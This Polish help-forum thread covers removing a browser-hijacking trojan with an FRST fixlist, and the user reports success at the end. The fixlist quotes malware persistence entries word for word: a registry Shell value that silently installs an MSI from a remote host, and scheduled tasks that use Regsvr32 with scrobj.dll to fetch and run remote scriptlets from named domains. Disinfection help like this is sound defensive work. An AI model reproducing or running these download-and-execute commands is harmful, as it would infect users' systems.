rylec90 utworzono 24 kwietnia 2017 utworzono 24 kwietnia 2017 Witam, Od paru dni mam problem z jakaś infekcja typu trojan który atakuję przeglądarki, z syfiastymi stronami startowymi, skanowanie adwcleaner wykazało robactwo które usuwa, ale po paru minutach pracy na przeglądarkach znów avast coś wykrywa i tak w kółko adwcleaner znajduję usuwa i znów to samo się łapie. Nie mam pojęcia co zrobić, przeinstalowywałem przeglądarki, czyściłem ale to nic nie daję. Proszę specjalistów o pomoc. Poniżej daję logi z programu FRST Addition_25-04-2017 00.01.38.txt FRST_25-04-2017 00.01.38.txt Shortcut_25-04-2017 00.01.38.txt
Twój_Anioł_Stróż komentarz 25 kwietnia 2017 komentarz 25 kwietnia 2017 Cytuj C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Kysys\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Kysys\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk Te skróty dam do usuwania, bo przekierowują do fałszywych przeglądarek, wyglądających jak Firefox i Google Chrome, ale w rzeczywistości będących Trojanami. Potem zrobisz sobie nowe skróty w tych samych lokalizacjach. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-2592100327-3344574049-2118668459-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1WNWMxMWw1OWRSMjk2NkUdMjRWRjH5MTVQRYY3Fdq1NF== /q IFEO\taskmgr.exe: [Debugger] RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Kysys\AppData\Local\3DM RemoveDirectory: C:\ProgramData\SWCUTemp RemoveDirectory: C:\ProgramData\Software RemoveDirectory: C:\Program Files (x86)\BiaoJi RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Users\Kysys\AppData\Roaming\SSMgre Task: {05E69E2E-E247-45BC-A14C-9BD80AF94FE6} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {09ED9F0A-287B-4269-A9B4-6C6DA8A98531} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1WNWMxMWw1OWRSMjk2NkUdMjRWRjH5MTVQRYY3Fdq1NF== scrobj.dll Task: {0C64F50D-AF39-4917-9AC7-5E888EE737D1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {23E3DE95-BDE4-434A-A6CE-CE16FB3A77D5} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku <==== UWAGA Task: {532E02EE-9DB3-4603-8C88-9B9BAFF63CFE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: {653993A3-6DB6-41D7-9E8B-504EEA64CD15} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {8C83C757-AC68-43FA-8853-F3E81BEF896C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {A2B66C35-6067-44BB-9F50-EA1FC09A2DA8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {BB4292BD-1A5D-4CF4-9425-E42DF4ACA7D1} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1WNWMxMWw1OWRSMjk2NkUdMjRWRjH5MTVQRYY3Fdq1NF== scrobj.dll Task: {BF962C8C-F99E-41CD-AFD1-933C29DA529D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {D399229D-EAA4-4DFC-B0B0-B89CD86255B1} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {E5D9160C-3DA7-4588-ADC7-5C8874EB231A} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {F7EC4E0E-70C3-4634-97AC-AE98DC24CE94} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA FirewallRules: [{799C5FD6-4402-4723-B0D3-325A8135C988}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe FirewallRules: [{B5748F53-528D-4FBA-95F5-0CAB512E22B9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{EC88571C-68A3-4A02-84BB-3293F074CA39}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe S2 3DM; C:\Users\Kysys\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [Brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] C:\ProgramData\Software\Apple\Apps\Notification.dll 2017-04-20 17:32 - 2017-04-20 17:32 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-04-20 17:31 - 2017-04-20 17:31 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-04-17 21:27 - 2017-04-19 18:59 - 00000000 _____ C:\WINDOWS\SysWOW64\1 2017-04-17 19:41 - 2017-04-17 19:41 - 00000007 _____ C:\WINDOWS\SysWOW64\7D1D.tmp C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Kysys\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Kysys\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk HOSTS: EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix (NAPRAW). ---------------------- Jeśli będzie OK, to będziemy kończyć: Otwórz Notatnik i wklej w nim: DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW). przez SHIFT+DEL usuń pozostały folder C:\FRST.
rylec90 komentarz 25 kwietnia 2017 Autor komentarz 25 kwietnia 2017 Póki co po wykonaniu tych operacji, jest dobrze, mam nadzieję że to pomogło i nie wróci. Dziękuję bardzo za pomoc, w razie jakiś problemów będę pisał.
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.